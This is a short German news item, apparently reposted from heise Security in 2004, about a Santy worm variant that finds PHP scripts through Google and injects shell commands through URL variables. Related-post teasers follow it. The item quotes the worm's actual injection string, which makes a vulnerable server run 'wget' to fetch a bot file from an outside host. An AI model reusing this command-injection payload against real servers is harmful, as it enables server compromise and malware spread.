Wurm attackiert PHP-Skripte
Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700
2004-12-26 00:00:00 2004-12-26 00:00:00 admin
Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:
http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;
Ãberprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.
hiese.de
Erfahrungen
Hier Kannst Du einen Kommentar verfassen
Verwandte Beiträge
WinLinux 2001: "Der freundliche Pinguin"
Linux muss nicht kompliziert sein, das zumindest verspricht "WinLinux 2001", das erste Linux für Windows 95/98 und ME. Ohne Neupartitionierung installiert WinLinux ein Linux-System auf einem Windows-System. ...

Autor :
admin
Kategorie:
Software & Web-Development
ASP-konferenz
Anfang Dezember ist es wieder so weit die 2te ASP-konferenz Die Themenbereiche -Neues (ASP+, C-bewährtes (Einsteigersessions) -Tipps & Tricks ( wie löse ich dieses Problem besser) 2 Tage, 2 parallele Tracks und 24 Sessions werden Informa ...

Autor :
admin
Kategorie:
Software & Web-Development
ebiz-webhosting startet mit neuen attraktiven Angeboten und größerem Leistungsumfang in den Herbst
Speziell an Geschäftskunden richtet sich das neue Serverrack-Angebot von ebiz-webhosting. ...

Autor :
admin
Kategorie:
Dies und Das
Sie sind bei T-online und wollen T-DSL? Telekom- Abzocke hier
Die DSL- Technik bekommt in der letzten Zeit einen schlechten Ruf. Nicht nur dass die Anschlüsse auf sich warten lassen, nein, so manch ein Onlinegamer hat sich gefreut auf die Performance Steigerung.Aber leider sieht die Warheit anders aus. T-DSL ist für ...

Autor :
admin
Kategorie:
Software & Web-Development
3D Studio MAX for free!
3D Studio Max wird um Open Source Projekt! Wer diese Version erhält könnt ihr hier nachlesen. ...

Autor :
admin
Kategorie:
Software & Web-Development
Zend Accelerator 2.0 beschleunigt PHP-Applikationen
Zend Technologies bringt die Version 2.0 des Zend Accelerator, eine Weiterentwicklung des Zend Cache für in PHP realisierte Web-Applikationen, auf den Markt. Das neue Release umfasst umfangreiche Erweiterungen wie z.B. die Leistungsüberwachung in Echtzeit ...

Autor :
admin
Kategorie:
Software & Web-Development